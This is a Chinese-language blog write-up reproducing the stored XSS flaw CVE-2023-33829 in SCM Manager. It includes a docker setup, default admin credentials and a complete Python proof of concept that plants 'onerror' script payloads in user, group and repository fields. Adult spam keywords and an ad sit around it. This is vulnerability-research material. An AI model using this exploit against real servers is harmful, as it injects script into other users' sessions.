国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

SCM Manager XSS漏洞復(fù)現(xiàn)(CVE-2023-33829)

這篇具有很好參考價(jià)值的文章主要介紹了SCM Manager XSS漏洞復(fù)現(xiàn)(CVE-2023-33829)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

一、漏洞描述

漏洞簡述

SCM-Manager 是一款開源的版本庫管理軟件,同時(shí)支持 subversion、mercurial、git 的版本庫管理。安裝簡單,功能較強(qiáng),提供用戶、用戶組的權(quán)限管理 ,有豐富的插件支持。由于在MIT的許可下是開源的,因此它允許被用于商業(yè)用途,而且其代碼可以在GitHub上獲取到。該項(xiàng)目最初只是被用于研究目的,而在其2.0版本之后,被Cloudogu公司接手管理和開發(fā)了其各種代碼庫,以便為各個(gè)公司提供專業(yè)的企業(yè)級(jí)支持。

該漏洞主要為攻擊者利用其多個(gè)功能的描述字段的代碼缺陷,構(gòu)造payload進(jìn)行XSS攻擊。

漏洞影響范圍

供應(yīng)商:Cloudogu

產(chǎn)品:SCM Manager

確認(rèn)受影響版本:SCM Manager 1.2 <= 1.60

修復(fù)版本:>1.60 最新版本為2.43.1

二、漏洞復(fù)現(xiàn)實(shí)戰(zhàn)

環(huán)境搭建

docker鏡像:

https://bitbucket.org/sdorra/docker-scm-manager/src/master/

利用shell腳本搭建

shell:

#!/bin/bash
?
mkdir /var/lib/scm
chown 1000:1000 /var/lib/scm
docker run -v /var/lib/scm:/var/lib/scm -p 8080:8080 sdorra/scm-manager

漏洞復(fù)現(xiàn)

首先訪問SCM Manager,需身份認(rèn)證

Username : scmadmin Password: scmadmin

repositories

repository功能下Description字段該漏洞可利用

創(chuàng)建新repository,并payload進(jìn)行利用

Git類型:

Subversion類型:

Users

User功能下Display Name字段該漏洞可利用

【----幫助網(wǎng)安學(xué)習(xí),以下所有學(xué)習(xí)資料免費(fèi)領(lǐng)!加vx:yj009991,備注 “博客園” 獲??!】

 ① 網(wǎng)安學(xué)習(xí)成長路徑思維導(dǎo)圖
?、?60+網(wǎng)安經(jīng)典常用工具包
?、?100+SRC漏洞分析報(bào)告
?、?150+網(wǎng)安攻防實(shí)戰(zhàn)技術(shù)電子書
?、?最權(quán)威CISSP 認(rèn)證考試指南+題庫
?、?超1800頁CTF實(shí)戰(zhàn)技巧手冊(cè)
 ⑦ 最新網(wǎng)安大廠面試題合集(含答案)
?、?APP客戶端安全檢測(cè)指南(安卓+IOS)

創(chuàng)建新repository,并payload進(jìn)行利用

可以看到新創(chuàng)建的賬號(hào)中Display Name屬性下顯示異常,且XSS payload利用成功

Groups

Group功能下Description字段該漏洞可利用

另外可以根據(jù)POC進(jìn)行利用

POC:

import requests
import argparse
import sys
?
# Main menu
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
parser.add_argument("-u", "--user", help="Admin user or user with write permissions")
parser.add_argument("-p", "--password", help="password of the user")
args = parser.parse_args()
?
?
# Credentials
user = sys.argv[2]
password = sys.argv[4]
?
?
# Global Variables
main_url = "http://localhost:8080/scm" # Change URL if its necessary
auth_url = main_url + "/api/rest/authentication/login.json"
users = main_url + "/api/rest/users.json"
groups = main_url + "/api/rest/groups.json"
repos = main_url + "/api/rest/repositories.json"
?
# Create a session
session = requests.Session()
?
# Credentials to send
post_data={
 ?'username': user, # change if you have any other user with write permissions
 ?'password': password # change if you have any other user with write permissions
}
?
r = session.post(auth_url, data=post_data)
?
if r.status_code == 200:
 ?print("[+] Authentication successfully")
else:
 ?print("[-] Failed to authenticate")
 ?sys.exit(1)
?
new_user={
?
 ?"name": "newUser",
 ?"displayName": "<img src=x onerror=alert('XSS')>",
 ?"mail": "",
 ?"password": "",
 ?"admin": False,
 ?"active": True,
 ?"type": "xml"
?
}
?
create_user = session.post(users, json=new_user)
print("[+] User with XSS Payload created")
?
new_group={
?
 ?"name": "newGroup",
 ?"description": "<img src=x onerror=alert('XSS')>",
 ?"type": "xml"
?
}
?
create_group = session.post(groups, json=new_group)
print("[+] Group with XSS Payload created")
?
new_repo={
?
 ?"name": "newRepo",
 ?"type": "svn",
 ?"contact": "",
 ?"description": "<img src=x onerror=alert('XSS')>",
 ?"public": False
?
}
?
create_repo = session.post(repos, json=new_repo)
print("[+] Repository with XSS Payload created")

漏洞修復(fù)

建議更新至SCM Manager最新版本,目前為2.43.1

結(jié)束語

本文主要介紹了CVE-2023-33829 SCM Manager XSS漏洞復(fù)現(xiàn)過程,漏洞主要體現(xiàn)于攻擊者利用其多個(gè)功能的描述字段的代碼缺陷,構(gòu)造payload進(jìn)行XSS攻擊。

本漏洞可參考之處為敏感功能避免重復(fù)調(diào)用非敏感功能代碼,并做好過濾與校驗(yàn),進(jìn)行必要的安全測(cè)試。

更多網(wǎng)安技能的在線實(shí)操練習(xí),請(qǐng)點(diǎn)擊這里>>

?文章來源地址http://www.zghlxwxcb.cn/news/detail-473296.html

到了這里,關(guān)于SCM Manager XSS漏洞復(fù)現(xiàn)(CVE-2023-33829)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【漏洞復(fù)現(xiàn)】Weblogic CVE-2023-21839

    【漏洞復(fù)現(xiàn)】Weblogic CVE-2023-21839

    1. 產(chǎn)品簡介 WebLogic是Oracle公司研發(fā)的用于開發(fā)、集成、部署和管理大型分布式Web應(yīng)用、網(wǎng)絡(luò)應(yīng)用和數(shù)據(jù)庫應(yīng)用的Java應(yīng)用服務(wù)器,在全球范圍內(nèi)被廣泛使用。 2. 漏洞簡介 Oracle發(fā)布安全公告,修復(fù)了一個(gè)存在于WebLogic Core中的遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-21839),可在未經(jīng)身份驗(yàn)證

    2023年04月16日
    瀏覽(23)
  • 漏洞復(fù)現(xiàn) CVE-2023-0297( pyload遠(yuǎn)程代碼執(zhí)行漏洞 )

    在 addcrypted2() 函數(shù)中,對(duì)傳入的參數(shù) jk 解析后用 eval_js() 作為 JS 語句執(zhí)行。 利用 JS 中 pyimport 導(dǎo)入 OS 包,執(zhí)行系統(tǒng)命令(文件操作,進(jìn)程管理),還可以利用 os.system() 執(zhí)行 shell 命令。 構(gòu)建 payload 過程比較簡單,只要傳入所需的 package, crypted, jk, passwords 四個(gè)參數(shù)即可,這里

    2024年02月08日
    瀏覽(22)
  • CVE-2023-28432 MinIO 信息泄露漏洞--漏洞復(fù)現(xiàn)10

    微信公眾號(hào)搜索:南風(fēng)漏洞復(fù)現(xiàn)文庫 南風(fēng)網(wǎng)絡(luò)安全公眾號(hào)首發(fā) MinIO是美國MinIO公司的一款開源的對(duì)象存儲(chǔ)服務(wù)器, 是一款高性能、分布式的對(duì)象存儲(chǔ)系統(tǒng). 它是一款軟件產(chǎn)品, 可以100%的運(yùn)行在標(biāo)準(zhǔn)硬件。即X86等低成本機(jī)器也能夠很好的運(yùn)行MinIO。MinIO中存在一處信息泄露漏洞,

    2024年02月01日
    瀏覽(32)
  • CVE-2023-28432 MiniO信息泄露漏洞復(fù)現(xiàn)

    CVE-2023-28432 MiniO信息泄露漏洞復(fù)現(xiàn)

    MiniO 是一個(gè)基于 Apache License v2.0 開源協(xié)議的對(duì)象存儲(chǔ)服務(wù)。它兼容亞馬遜 S3 云存儲(chǔ)服務(wù)接口,非常適合于存儲(chǔ)大容量非結(jié)構(gòu)化的數(shù)據(jù),例如圖片、視頻、日志文件、備份數(shù)據(jù)和容器/虛擬機(jī)鏡像等 在集群部署的 Minio 中,未授權(quán)的攻擊者可發(fā)送惡意的 HTTP 請(qǐng)求來獲取 Minio 環(huán)境

    2024年02月12日
    瀏覽(48)
  • 泛微 E-Office文件上傳漏洞復(fù)現(xiàn)(CVE-2023-2523、CVE-2023-2648)

    泛微 E-Office文件上傳漏洞復(fù)現(xiàn)(CVE-2023-2523、CVE-2023-2648)

    ? ? ? 泛微E-Office是一款標(biāo)準(zhǔn)化的協(xié)同 OA 辦公軟件,泛微協(xié)同辦公產(chǎn)品系列成員之一,實(shí)行通用化產(chǎn)品設(shè)計(jì),充分貼合企業(yè)管理需求,本著簡潔易用、高效智能的原則,為企業(yè)快速打造移動(dòng)化、無紙化、數(shù)字化的辦公平臺(tái)。 cve-2023-2523 ? ? 泛微e-office 9.5版本,源文件 App/Ajax/a

    2024年02月06日
    瀏覽(25)
  • CVE-2023-23752:Joomla未授權(quán)訪問漏洞復(fù)現(xiàn)

    本次測(cè)試僅供學(xué)習(xí)使用,如若非法他用,與本文作者無關(guān),需自行負(fù)責(zé)!??! Joomla是一個(gè)免費(fèi)的開源內(nèi)容管理系統(tǒng)(CMS),允許用戶構(gòu)建網(wǎng)站和在線應(yīng)用程序。它于 2005 年首次發(fā)布,此后成為最受歡迎的 CMS 平臺(tái)之一,為全球數(shù)百萬個(gè)網(wǎng)站提供支持。 在 Joomla! 4.0.0 到 4.2.7

    2024年02月10日
    瀏覽(17)
  • 漏洞復(fù)現(xiàn) || SolarView Compact 存在任意命令執(zhí)行漏洞(CVE-2023-23333)

    漏洞復(fù)現(xiàn) || SolarView Compact 存在任意命令執(zhí)行漏洞(CVE-2023-23333)

    技術(shù)文章僅供參考,任何個(gè)人和組織使用網(wǎng)絡(luò)應(yīng)當(dāng)遵守憲法法律,遵守公共秩序,尊重社會(huì)公德,不得利用網(wǎng)絡(luò)從事危害國家安全、榮譽(yù)和利益,未經(jīng)授權(quán)請(qǐng)勿利用文章中的技術(shù)資料對(duì)任何計(jì)算機(jī)系統(tǒng)進(jìn)行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失,均

    2024年02月15日
    瀏覽(17)
  • CVE-2023-21839:Weblogic反序列化漏洞復(fù)現(xiàn)

    聲明:僅供學(xué)習(xí)參考使用,請(qǐng)勿用作違法用途,否則后果自負(fù) 在進(jìn)行漏洞復(fù)現(xiàn)前簡單描述一下什么是序列化和反序列化: 1、序列化和反序列化的定義: (1)Java序列化就是指把Java對(duì)象轉(zhuǎn)換為字節(jié)序列的過程。 Java反序列化就是指把字節(jié)序列恢復(fù)為Java對(duì)象的過程。 (2)序列化最重

    2024年02月13日
    瀏覽(20)
  • Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

    Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

    序列化(Serialization):將對(duì)象的狀態(tài)信息轉(zhuǎn)換為可以存儲(chǔ)或傳輸?shù)男问降倪^程,一般將對(duì)象轉(zhuǎn)換為字節(jié)流。序列化時(shí),對(duì)象的當(dāng)前狀態(tài)被寫入到臨時(shí)或持久性存儲(chǔ)區(qū)(文件、內(nèi)存、數(shù)據(jù)庫等)。 反序列化(Deserialization):從序列化的表示形式中提取數(shù)據(jù),即把有序字節(jié)流恢

    2024年02月07日
    瀏覽(30)
  • Kafka Connect JNDI注入漏洞復(fù)現(xiàn)(CVE-2023-25194)

    Kafka Connect JNDI注入漏洞復(fù)現(xiàn)(CVE-2023-25194)

    2.3.0 = Apache Kafka = 3.3.2 我是通過vulhub下載的環(huán)境,下載后直接啟動(dòng)即可。 打開頁面,漏洞點(diǎn)在Load data功能頁中。 在Load data功能頁中的Streaming功能中。 在該功能中,將payload填寫到Consumer properties屬性值中即可。 在payload提交前,請(qǐng)先在vps機(jī)器中開啟ldap服務(wù)。 使用低版本的jdk中

    2024年02月16日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包